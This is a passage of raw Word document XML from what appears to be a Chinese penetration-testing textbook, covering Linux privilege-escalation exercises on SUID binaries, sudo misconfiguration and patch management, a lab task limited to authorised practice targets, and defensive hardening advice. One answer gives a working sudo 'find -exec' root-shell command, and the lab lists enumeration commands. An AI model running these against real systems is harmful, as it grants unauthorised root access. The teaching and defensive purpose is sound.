        </w:rPr>
        <w:t xml:space="preserve">字解释，一个无特权的攻击者如何利用配置错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序实现提权，并说明被违反的假设是什么。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：从“进程的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与文件属主的关系”切入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点：SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件在运行时，进程的有效用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（EUID）被设为文件属主的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID，而非调用者的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID。如果文件属主为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，进程便以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限运行。被违反的假设是——文件属主可信任该程序在所有可能的输入下都安全运行。当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序内部存在命令注入、路径欺骗或缓冲区溢出等问题时，攻击者便可利用该程序以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份执行任意操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.2.2：sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置错误与利用逻辑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">某服务器的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出显示用户可执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份，无需密码）。请说明攻击者如何利用此权限获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell，并指出防御方应如何修正</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数可以执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点：攻击者运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo find . -exec /bin/bash \;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会以当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EUID（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root）执行指定的命令。防御方应避免授予用户执行可直接生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“危险”命令的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限。如果确实需要该命令，应使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NOEXEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标记或为特定安全任务编写包装脚本，限制可执行子命令的范围。更好的做法是分析业务需求，以专门开发的受控脚本替代直接运行的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.2.3：补丁管理的防御原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么“及时给内核打补丁”是防御内核漏洞提权的关键措施？同时也请指出，仅依赖补丁管理的防御思维有哪些局限性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：从攻击者的已知漏洞利用周期和补丁部署的时间差入手。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点：内核漏洞一旦被公开并分配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编号，安全社区（包括攻击者）会迅速分析补丁并逆向出漏洞细节，据此开发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit。系统在没有修补的窗口期（从漏洞公开到补丁部署完成）内，暴露于已知、可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的威胁之下。及时打补丁能够缩短这一窗口。局限性在于：补丁管理无法防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0day（未公开漏洞）；补丁的测试和部署周期在大型生产环境中不可压缩至零；部分老旧系统无法获得内核更新；以及补丁本身可能引入新问题。因此补丁管理必须与内核加固和运行态监控组合使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.2.A（另一台靶机找提权点）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在读者已完成第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节授权的首台靶机演练后，选择另一台官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权专题靶机），重复以下全周期：①使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件；②使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计当前用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限；③检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crontab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录中是否有可写的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务；④使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capabilities。记录所有发现的潜在提权点，不必全部利用，但需对每一项判断其是否可能带来</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限并解释原因。完成后写一份简短的“蓝队加固建议”，说明如果这是你维护的服务器，你会如何逐一消除这些提权点。所有操作保持在隔离靶机环境中，不得在生产系统上运行上述命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="283"/>
    <w:bookmarkStart w:id="284" w:name="小结-19"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞提权的本质是破坏用户态与内核态的隔离假设——利用内核代码的内存破坏漏洞，从用户态发起攻击以获取内核级代码执行或关键数据结构篡改的能力，最终获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞的概念流程通常涉及：触发内核漏洞→内存破坏→改写进程凭证或劫持内核控制流→返回用户态时进程已被提升为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root。具体漏洞细节因内核版本和硬件平台而异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对内核漏洞的防御，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不应仅限于修补漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而应构建纵深防御：补丁管理解决已知漏洞窗口，最小权限与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计收缩攻击面，内核缓解机制（KASLR/SMEP/SMAP/KPTI）提高利用门槛，监控告警提供检测与响应能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队对外部提权行为的检测视角应聚焦于进程树的异常——普通权限进程派生出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell、非法的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uid/gid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变更、以及内核日志中的异常错误信息，这些痕迹是难以完全隐藏的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="284"/>
    <w:bookmarkStart w:id="285" w:name="延伸阅读白名单-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">课程资料（PWK/PEN-200）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：OffSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的渗透测试课程中将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权作为独立模块，包含从枚举到利用的系统方法论。其靶机练习环境（OffSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Proving </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Grounds）提供了大量经过审核的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权场景以供练习。本书强调以实测为准，读者应在授权靶机中结合实际操作理解概念。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weidman《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Georgia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Weidman </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的著作中包含了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权与后渗透的入门级实操指南，适合与本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章配合阅读，加深对提权枚举与漏洞利用逻辑的实践感知。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HackTricks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在线知识库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：由安全社区维护的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权技术进行了持续更新的介绍，涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID、sudo、capabilities、内核漏洞等多种路径。本书建议读者将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为实际操作的快速参考，但务必以授权靶机内的实测结果为准，因为任何在线参考的内容都可能因版本变化和靶机配置差异而需要调整。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
